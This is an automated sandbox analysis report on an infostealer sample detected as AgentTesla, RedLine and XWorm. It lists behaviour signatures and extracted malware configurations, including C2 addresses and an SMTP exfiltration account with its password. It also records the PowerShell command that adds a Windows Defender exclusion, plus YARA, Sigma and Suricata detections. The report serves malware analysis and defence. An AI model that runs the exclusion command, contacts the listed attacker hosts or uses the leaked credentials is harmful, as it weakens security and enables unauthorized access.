Edit tour

Windows Analysis Report
RFQPO3D93876738.scr.exe

Overview

General Information

Sample name:	RFQPO3D93876738.scr.exe
Analysis ID:	1478521
MD5:	f36b1d0ac09e4c4b382fb055192ad8dc
SHA1:	fe0b1fb79204765643e33848a8b164e0cfe190ae
SHA256:	698d95343ffa1d8e7fed498cde18c02aa8ea18082b064b0c70ac7b8b04f4ccb2
Tags:	exeRedLineStealer
Infos:

Detection

AgentTesla, RedLine, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected RedLine Stealer

Yara detected UAC Bypass using CMSTP

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to log keystrokes (.Net Source)

Disables UAC (registry)

Found many strings related to Crypto-Wallets (likely being stolen)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Outbound SMTP Connections

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

RFQPO3D93876738.scr.exe (PID: 7368 cmdline: "C:\Users\user\Desktop\RFQPO3D93876738.scr.exe" MD5: F36B1D0AC09E4C4B382FB055192AD8DC)

conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQPO3D93876738.scr.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7936 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

AddInProcess32.exe (PID: 7660 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

WerFault.exe (PID: 7784 cmdline: C:\Windows\system32\WerFault.exe -u -p 7368 -s 1044 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["212.162.149.48"], "Port": "7011", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Threatname: RedLine

{"C2 url": ["212.162.149.48:2049"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.1551992222.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000006.00000002.1551992222.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7594:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7631:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7746:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x72ea:$cnc4: POST / HTTP/1.1
00000000.00000002.1554585677.000002422D352000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000006.00000002.1570014475.0000000007860000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000006.00000002.1568767858.0000000007200000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.1568767858.0000000007200000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.1568767858.0000000007200000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000006.00000002.1554299366.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1554585677.000002422D096000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1554585677.000002422D096000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4f9f4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x58834:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4fa91:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x588d1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x4fba6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x589e6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4f74a:$cnc4: POST / HTTP/1.1 0x5858a:$cnc4: POST / HTTP/1.1
Process Memory Space: RFQPO3D93876738.scr.exe PID: 7368	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: RFQPO3D93876738.scr.exe PID: 7368	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RFQPO3D93876738.scr.exe PID: 7368	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: AddInProcess32.exe PID: 7660	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: AddInProcess32.exe PID: 7660	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AddInProcess32.exe PID: 7660	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: AddInProcess32.exe PID: 7660	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x5994:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5a31:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5b46:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x56ea:$cnc4: POST / HTTP/1.1
6.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
6.2.AddInProcess32.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7794:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7831:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7946:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x74ea:$cnc4: POST / HTTP/1.1
0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x5994:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5a31:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5b46:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x56ea:$cnc4: POST / HTTP/1.1
6.2.AddInProcess32.exe.7860000.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.2.AddInProcess32.exe.7860000.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.2.AddInProcess32.exe.7200000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.AddInProcess32.exe.7200000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
6.2.AddInProcess32.exe.7200000.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33a7b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33aed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33b77:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33c09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33c73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33ce5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33d7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33e0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
6.2.AddInProcess32.exe.7200000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.AddInProcess32.exe.7200000.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
6.2.AddInProcess32.exe.7200000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7794:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7831:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7946:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x74ea:$cnc4: POST / HTTP/1.1
0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7794:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x105d4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7831:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x10671:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7946:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10786:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x74ea:$cnc4: POST / HTTP/1.1 0x1032a:$cnc4: POST / HTTP/1.1
Click to see the 13 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQPO3D93876738.scr.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQPO3D93876738.scr.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQPO3D93876738.scr.exe", ParentImage: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe, ParentProcessId: 7368, ParentProcessName: RFQPO3D93876738.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQPO3D93876738.scr.exe" -Force, ProcessId: 7604, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, Initiated: true, ProcessId: 7660, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49709

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQPO3D93876738.scr.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQPO3D93876738.scr.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQPO3D93876738.scr.exe", ParentImage: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe, ParentProcessId: 7368, ParentProcessName: RFQPO3D93876738.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQPO3D93876738.scr.exe" -Force, ProcessId: 7604, ProcessName: powershell.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:28.284473+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:27.721310+0200
SID:	2852923
Source Port:	49704
Destination Port:	7011
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:29.649246+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:30.498013+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:29.390373+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) - Source IP: 212.162.149.48 - Destination IP: 192.168.2.7

Timestamp:	2024-07-22T17:52:26.497449+0200
SID:	2046056
Source Port:	2049
Destination Port:	49707
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:29.932988+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:21.068683+0200
SID:	2046045
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:28.279308+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:26.623937+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:26.492100+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:30.073337+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:28.444756+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:26.284063+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:27.942907+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:27.579761+0200
SID:	2855924
Source Port:	49704
Destination Port:	7011
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:28.723819+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:30.653489+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 212.162.149.48 - Destination IP: 192.168.2.7

Timestamp:	2024-07-22T17:52:21.198421+0200
SID:	2043234
Source Port:	2049
Destination Port:	49707
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:27.644096+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:30.366036+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes - Source IP: 212.162.149.48 - Destination IP: 192.168.2.7

Timestamp:	2024-07-22T17:52:27.717948+0200
SID:	2852870
Source Port:	7011
Destination Port:	49704
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:29.519706+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:27.810815+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:29.798534+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:30.208043+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:28.079962+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:26.879159+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

